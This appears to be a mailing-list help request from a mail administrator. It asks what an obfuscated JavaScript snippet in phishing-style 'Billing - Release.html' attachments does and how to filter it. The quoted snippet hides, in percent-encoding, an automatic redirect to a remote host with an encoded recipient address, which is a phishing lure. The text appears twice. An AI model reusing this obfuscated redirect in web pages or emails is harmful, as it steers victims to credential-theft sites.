Hi,
I'm using SA with amavisd and keep receiving emails with image
attachments with random filenames and "Billing - Release.html" that
contains the following javascript. What does it do? How do we block
them, outside of blocking HTML altogether?
<script language="javascript">
document.write(unescape('%3c%2f%64%69%76%3e%0a%3c%70%3e%20%44%65%61%72%2c%20%3c%62%2f%3e%42%69%6c%6c%69%6e%67%3c%2f%62%3e%0a%0a%3c%73%63%72%69%70%74%20%74%79%70%65%3d%22%74%65%78%74%2f%4a%61%76%61%53%63%72%69%70%74%22%3e%0a%20%20%20%20%20%20%73%65%74%54%69%6d%65%6f%75%74%28%22%6c%6f%63%61%74%69%6f%6e%2e%68%72%65%66%20%3d%20%27%68%74%74%70%73%3a%2f%2f%75%66%61%78%2e%77%6f%72%6b%2f%59%6d%6c%73%62%47%6c%75%5a%30%42%7a%62%57%46%79%64%47%31%73%63%79%35%6a%62%32%30%3d%27%3b%22%2c%29%3b%0a%20%3c%2f%73%63%72%69%70%74%3e'));
</script>
I'm using SA with amavisd and keep receiving emails with image
attachments with random filenames and "Billing - Release.html" that
contains the following javascript. What does it do? How do we block
them, outside of blocking HTML altogether?
<script language="javascript">
document.write(unescape('%3c%2f%64%69%76%3e%0a%3c%70%3e%20%44%65%61%72%2c%20%3c%62%2f%3e%42%69%6c%6c%69%6e%67%3c%2f%62%3e%0a%0a%3c%73%63%72%69%70%74%20%74%79%70%65%3d%22%74%65%78%74%2f%4a%61%76%61%53%63%72%69%70%74%22%3e%0a%20%20%20%20%20%20%73%65%74%54%69%6d%65%6f%75%74%28%22%6c%6f%63%61%74%69%6f%6e%2e%68%72%65%66%20%3d%20%27%68%74%74%70%73%3a%2f%2f%75%66%61%78%2e%77%6f%72%6b%2f%59%6d%6c%73%62%47%6c%75%5a%30%42%7a%62%57%46%79%64%47%31%73%63%79%35%6a%62%32%30%3d%27%3b%22%2c%29%3b%0a%20%3c%2f%73%63%72%69%70%74%3e'));
</script>